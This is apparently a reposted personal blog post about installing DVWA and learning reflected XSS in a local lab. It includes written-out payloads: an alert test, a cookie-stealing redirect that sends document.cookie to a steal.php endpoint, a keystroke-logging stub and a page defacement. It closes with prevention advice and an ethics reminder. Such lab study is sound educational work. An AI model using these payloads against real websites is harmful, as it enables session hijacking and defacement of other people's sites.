██FR█████ █INTELL███████████

A Personal Journey: Understanding Reflected XSS Through My DVWA Setup


This content originally appeared on DEV Community and was authored by Samuel Adeduntan

My Overview of Web Application Security

Sharing my own experience of finding and comprehending Reflected XSS vulnerabilities excites me. Setting up DVWA (Damn Vulnerable Web Application) was the ideal hands-on learning environment for me as someone who has been studying cybersecurity. Allow me to take you through my journey, including the challenges, discoveries, and important lessons I’ve learnt.

My Setup Obstacles: The Start of Real-World Education

The Docker Obstacle

When I first began out, I believed that Docker would be the simplest route:

The Docker Hurdle

But quickly hit my first roadblock: Command ‘docker’ not found

This taught me my first lesson: assumptions about pre-installed tools can derail your progress. Rather than getting frustrated, I pivoted to a manual installation.

My Manual DVWA Installation
I decided to go the traditional route:

Installation command

The permission issues were expected but easily solved

permission

Database Configuration: My Biggest Challenge

Here’s where things got interesting for me. The database conflicts were real:

Database Configuration

The control procedure ended with an error code, which is why the mariadb.service job failed.

I found that MySQL was already operating on XAMPP:

screenshot

Working directly with the MariaDB system and terminating XAMPP’s service was the solution:

Screenshot

My Password Reset Adventure

I encountered authentication issues and had to reset the MySQL root password:

screenshot

Next, in a different terminal i inpute this:
MariaDB [(none)]> UPDATE user SET authentication_string=PASSWORD(‘mynewpassword’)

I learned more about database administration from this practical troubleshooting than from any tutorial!

My Exploration of Reflected XSS

First Contact with the Vulnerability, After finally getting DVWA running, I navigated to the reflected XSS section. The simple form asking for my name seemed innocent enough, but I knew better.

My first test was classic:

alert(‘XSS Success!’)

I was both excited and concerned when the alert appeared; I was excited to realize how vulnerable I was, and I was worried about how widespread this must be in the wild.

Developing My Understanding, I spent hours experimenting with different payloads:

*– Cookie stealing attempts (in my controlled environment):
*document.location=&#39;<a href=”http://localhost/steal.php?cookie=&#x27;+document.cookie”>http://localhost/steal.php?cookie=&#39;+document.cookie</a>

– Keylogger simulations: document.onkeypress = function(e) { console.log(e.key); }

– Defacement tests: document.body.innerHTML = &#39;<h1>This site has been hacked</h1>&#39;;

I gained a deeper comprehension of the possible impact with each trial.

Some of my “Aha!” moments

The Understanding of Input Sanitization, Upon examining the susceptible code, I realized why this occurred:

amazing

The application made a risky assumption by fully trusting user input.

The Disclosure of Security Levels

It was enlightening to experiment with various DVWA security levels:

  • Low: No defense
  • Medium: Simple filtering that is evasive
  • High: Using htmlspecialchars() for proper sanitization

This demonstrated to me how protective tactics have changed over time.

My Personal Security Lessons

The Things I Discovered About Prevention

  • Always double-check input I now see why this is rule #1.
  • Due to the differences between HTML, JavaScript, and URL encoding, use context-appropriate encoding.
  • Put CSP headers into practice because they offer a crucial safety precaution.

My Shifted Viewpoint

Before this hands-on experience, XSS was just a theoretical concept to me, but Now:

  • When I write code, input validation comes to mind right away.
  • I inspect web applications more critically
  • I understand why security headers matter

My Advice to Fellow Learners

If you’re starting your security journey:

  • Expect setup challenges – They’re learning opportunities in disguise
  • Experiment safely – Use environments like DVWA, not real websites
  • Understand the why – Don’t just execute payloads; understand how they work
  • Learn prevention – Understanding attacks is useless without knowing defense

My Continuing Journey

This DVWA setup and XSS exploration was just the beginning for me. I’m now exploring:

  • Stored XSS vulnerabilities
  • DOM-based XSS
  • Advanced filtering bypass techniques
  • Automated vulnerability scanning Every day brings new challenges and learning opportunities in this fascinating field.

My own experiences learning about web application security are reflected in my personal journey. Don’t forget to only test systems you own or have authorization to test, and always practice ethical hacking.


This content originally appeared on DEV Community and was authored by Samuel Adeduntan